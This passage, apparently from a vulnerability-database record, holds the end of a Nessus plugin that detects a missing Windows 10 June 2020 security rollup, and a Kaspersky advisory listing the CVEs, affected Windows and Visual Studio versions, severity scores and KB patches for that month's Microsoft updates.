value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4560960'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18362',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960]) ||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-17T03:22:39", "bulletinFamily": "info", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", 
"CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1284", "CVE-2020-1120", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1265", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "description": "### *Detect date*:\n06/09/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, or bypass security restrictions.\n\n### *Affected products*:\nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nMicrosoft Visual Studio 2019 version 16.6 (includes 16.0 - 16.5) \nMicrosoft Visual Studio 2015 Update 3 \nWindows Server 2019 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nMicrosoft Visual Studio 2019 version 16.0 \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 
Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 2004 for HoloLens \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1903 for HoloLens \nWindows 10 Version 1809 for HoloLens \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server, version 1903 (Server Core installation)\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0986](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0986>) \n[CVE-2020-1348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1348>) \n[CVE-2020-1264](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1264>) \n[CVE-2020-1265](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1265>) \n[CVE-2020-1266](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1266>) \n[CVE-2020-1261](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1261>) \n[CVE-2020-1262](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1262>) \n[CVE-2020-1263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1263>) \n[CVE-2020-1268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1268>) \n[CVE-2020-1269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1269>) 
\n[CVE-2020-1299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1299>) \n[CVE-2020-1291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1291>) \n[CVE-2020-1290](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1290>) \n[CVE-2020-1293](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1293>) \n[CVE-2020-1292](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1292>) \n[CVE-2020-1294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1294>) \n[CVE-2020-1296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1296>) \n[CVE-2020-1160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1160>) \n[CVE-2020-1259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1259>) \n[CVE-2020-1311](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1311>) \n[CVE-2020-1211](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1211>) \n[CVE-2020-1162](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1162>) \n[CVE-2020-1212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1212>) \n[CVE-2020-1217](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1217>) \n[CVE-2020-1282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1282>) \n[CVE-2020-1283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1283>) \n[CVE-2020-1280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1280>) \n[CVE-2020-1281](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1281>) \n[CVE-2020-1286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1286>) 
\n[CVE-2020-1287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1287>) \n[CVE-2020-1284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1284>) \n[CVE-2020-1202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1202>) \n[CVE-2020-1203](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1203>) \n[CVE-2020-1201](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1201>) \n[CVE-2020-1206](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1206>) \n[CVE-2020-1207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1207>) \n[CVE-2020-1204](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1204>) \n[CVE-2020-1324](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1324>) \n[CVE-2020-1208](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1208>) \n[CVE-2020-1209](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1209>) \n[CVE-2020-1239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1239>) \n[CVE-2020-1238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1238>) \n[CVE-2020-1237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1237>) \n[CVE-2020-1236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1236>) \n[CVE-2020-1235](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1235>) \n[CVE-2020-1234](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1234>) \n[CVE-2020-1233](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1233>) \n[CVE-2020-1232](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1232>) 
\n[CVE-2020-1231](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1231>) \n[CVE-2020-1334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1334>) \n[CVE-2020-1222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1222>) \n[CVE-2020-1309](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1309>) \n[CVE-2020-1302](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1302>) \n[CVE-2020-1301](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1301>) \n[CVE-2020-1300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1300>) \n[CVE-2020-1307](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1307>) \n[CVE-2020-1306](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1306>) \n[CVE-2020-1305](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1305>) \n[CVE-2020-1304](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1304>) \n[CVE-2020-1196](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1196>) \n[CVE-2020-1197](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1197>) \n[CVE-2020-1194](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1194>) \n[CVE-2020-1199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1199>) \n[CVE-2020-1120](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1120>) \n[CVE-2020-1314](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1314>) \n[CVE-2020-1316](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1316>) \n[CVE-2020-1317](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1317>) 
\n[CVE-2020-1310](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1310>) \n[CVE-2020-1258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1258>) \n[CVE-2020-1312](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1312>) \n[CVE-2020-1313](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1313>) \n[CVE-2020-1255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1255>) \n[CVE-2020-1254](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1254>) \n[CVE-2020-1257](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1257>) \n[CVE-2020-1251](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1251>) \n[CVE-2020-1253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1253>) \n[CVE-2020-1248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1248>) \n[CVE-2020-1246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1246>) \n[CVE-2020-1247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1247>) \n[CVE-2020-1244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1244>) \n[CVE-2020-1241](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1241>) \n[CVE-2020-0915](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0915>) \n[CVE-2020-0916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0916>) \n[CVE-2020-1279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1279>) \n[CVE-2020-1278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1278>) \n[CVE-2020-1273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1273>) 
\n[CVE-2020-1272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1272>) \n[CVE-2020-1271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1271>) \n[CVE-2020-1270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1270>) \n[CVE-2020-1277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1277>) \n[CVE-2020-1276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1276>) \n[CVE-2020-1275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1275>) \n[CVE-2020-1274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1274>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2020-1160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1160>) 2.1 Warning \n[CVE-2020-1281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1281>) 6.8 High \n[CVE-2020-1287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1287>) 6.8 High \n[CVE-2020-1348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1348>) 4.3 Warning \n[CVE-2020-1301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1301>) 6.5 High \n[CVE-2020-1207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1207>) 7.2 High \n[CVE-2020-1262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1262>) 7.2 High \n[CVE-2020-1263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1263>) 2.1 Warning \n[CVE-2020-1246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1246>) 7.2 High \n[CVE-2020-1247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1247>) 7.2 High \n[CVE-2020-1208](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1208>) 9.3 Critical \n[CVE-2020-1300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1300>) 6.8 High 
\n[CVE-2020-1196](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1196>) 4.6 Warning \n[CVE-2020-1194](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1194>) 4.9 Warning \n[CVE-2020-1299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1299>) 9.3 Critical \n[CVE-2020-1291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1291>) 6.8 High \n[CVE-2020-1317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1317>) 9.0 Critical \n[CVE-2020-1239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1239>) 6.8 High \n[CVE-2020-1236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1236>) 9.3 Critical \n[CVE-2020-1314](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1314>) 6.8 High \n[CVE-2020-1212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1212>) 6.8 High \n[CVE-2020-1311](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1311>) 6.8 High \n[CVE-2020-1255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1255>) 6.5 High \n[CVE-2020-1254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1254>) 7.2 High \n[CVE-2020-1271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1271>) 4.6 Warning \n[CVE-2020-1270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1270>) 4.6 Warning \n[CVE-2020-1251](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1251>) 7.2 High \n[CVE-2020-1253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1253>) 7.2 High \n[CVE-2020-1272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1272>) 7.2 High \n[CVE-2020-1302](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1302>) 4.6 Warning \n[CVE-2020-0986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0986>) 7.2 High \n[CVE-2020-1264](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1264>) 4.6 Warning \n[CVE-2020-1265](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1265>) 4.6 Warning \n[CVE-2020-1266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1266>) 7.2 High 
\n[CVE-2020-1261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1261>) 2.1 Warning \n[CVE-2020-1268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1268>) 2.1 Warning \n[CVE-2020-1269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1269>) 7.2 High \n[CVE-2020-1290](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1290>) 2.1 Warning \n[CVE-2020-1293](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1293>) 4.6 Warning \n[CVE-2020-1292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1292>) 6.8 High \n[CVE-2020-1294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1294>) 6.8 High \n[CVE-2020-1296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1296>) 2.1 Warning \n[CVE-2020-1259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1259>) 4.0 Warning \n[CVE-2020-1211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1211>) 6.8 High \n[CVE-2020-1162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1162>) 4.6 Warning \n[CVE-2020-1217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1217>) 6.8 High \n[CVE-2020-1282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1282>) 6.8 High \n[CVE-2020-1283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1283>) 7.1 High \n[CVE-2020-1280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1280>) 6.8 High \n[CVE-2020-1286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1286>) 9.3 Critical \n[CVE-2020-1284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1284>) 4.3 Warning \n[CVE-2020-1202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1202>) 7.2 High \n[CVE-2020-1203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1203>) 7.2 High \n[CVE-2020-1201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1201>) 7.2 High \n[CVE-2020-1206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1206>) 5.0 Critical \n[CVE-2020-1204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1204>) 3.6 Warning 
\n[CVE-2020-1324](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1324>)4.6Warning \n[CVE-2020-1209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1209>)6.8High \n[CVE-2020-1238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1238>)6.8High \n[CVE-2020-1237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1237>)6.8High \n[CVE-2020-1235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1235>)6.8High \n[CVE-2020-1234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1234>)6.8High \n[CVE-2020-1233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1233>)6.8High \n[CVE-2020-1232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1232>)4.3Warning \n[CVE-2020-1231](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1231>)6.8High \n[CVE-2020-1334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1334>)4.6Warning \n[CVE-2020-1222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1222>)4.6Warning \n[CVE-2020-1309](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1309>)6.8High \n[CVE-2020-1307](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1307>)9.3Critical \n[CVE-2020-1306](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1306>)4.6Warning \n[CVE-2020-1305](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1305>)6.8High \n[CVE-2020-1304](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1304>)6.8High \n[CVE-2020-1197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1197>)7.2High \n[CVE-2020-1199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1199>)7.2High \n[CVE-2020-1120](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1120>)4.9Warning \n[CVE-2020-1316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1316>)7.2High \n[CVE-2020-1310](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1310>)7.2High \n[CVE-2020-1258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1258>)7.2High 
\n[CVE-2020-1312](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1312>)4.6Warning \n[CVE-2020-1313](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1313>)6.8High \n[CVE-2020-1257](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1257>)4.6Warning \n[CVE-2020-1248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1248>)9.3Critical \n[CVE-2020-1244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1244>)5.8High \n[CVE-2020-1241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1241>)6.8High \n[CVE-2020-0915](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0915>)7.2High \n[CVE-2020-0916](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0916>)7.2High \n[CVE-2020-1279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1279>)4.6Warning \n[CVE-2020-1278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1278>)4.6Warning \n[CVE-2020-1273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1273>)4.6Warning \n[CVE-2020-1277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1277>)4.6Warning \n[CVE-2020-1276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1276>)4.6Warning \n[CVE-2020-1275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1275>)4.6Warning \n[CVE-2020-1274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1274>)4.6Warning\n\n### *KB list*:\n[4549951](<http://support.microsoft.com/kb/4549951>) \n[4556799](<http://support.microsoft.com/kb/4556799>) \n[4561669](<http://support.microsoft.com/kb/4561669>) \n[4561645](<http://support.microsoft.com/kb/4561645>) \n[4561643](<http://support.microsoft.com/kb/4561643>) \n[4561670](<http://support.microsoft.com/kb/4561670>) \n[4561649](<http://support.microsoft.com/kb/4561649>) \n[4560960](<http://support.microsoft.com/kb/4560960>) \n[4557957](<http://support.microsoft.com/kb/4557957>) \n[4561666](<http://support.microsoft.com/kb/4561666>) \n[4561602](<http://support.microsoft.com/kb/4561602>) 
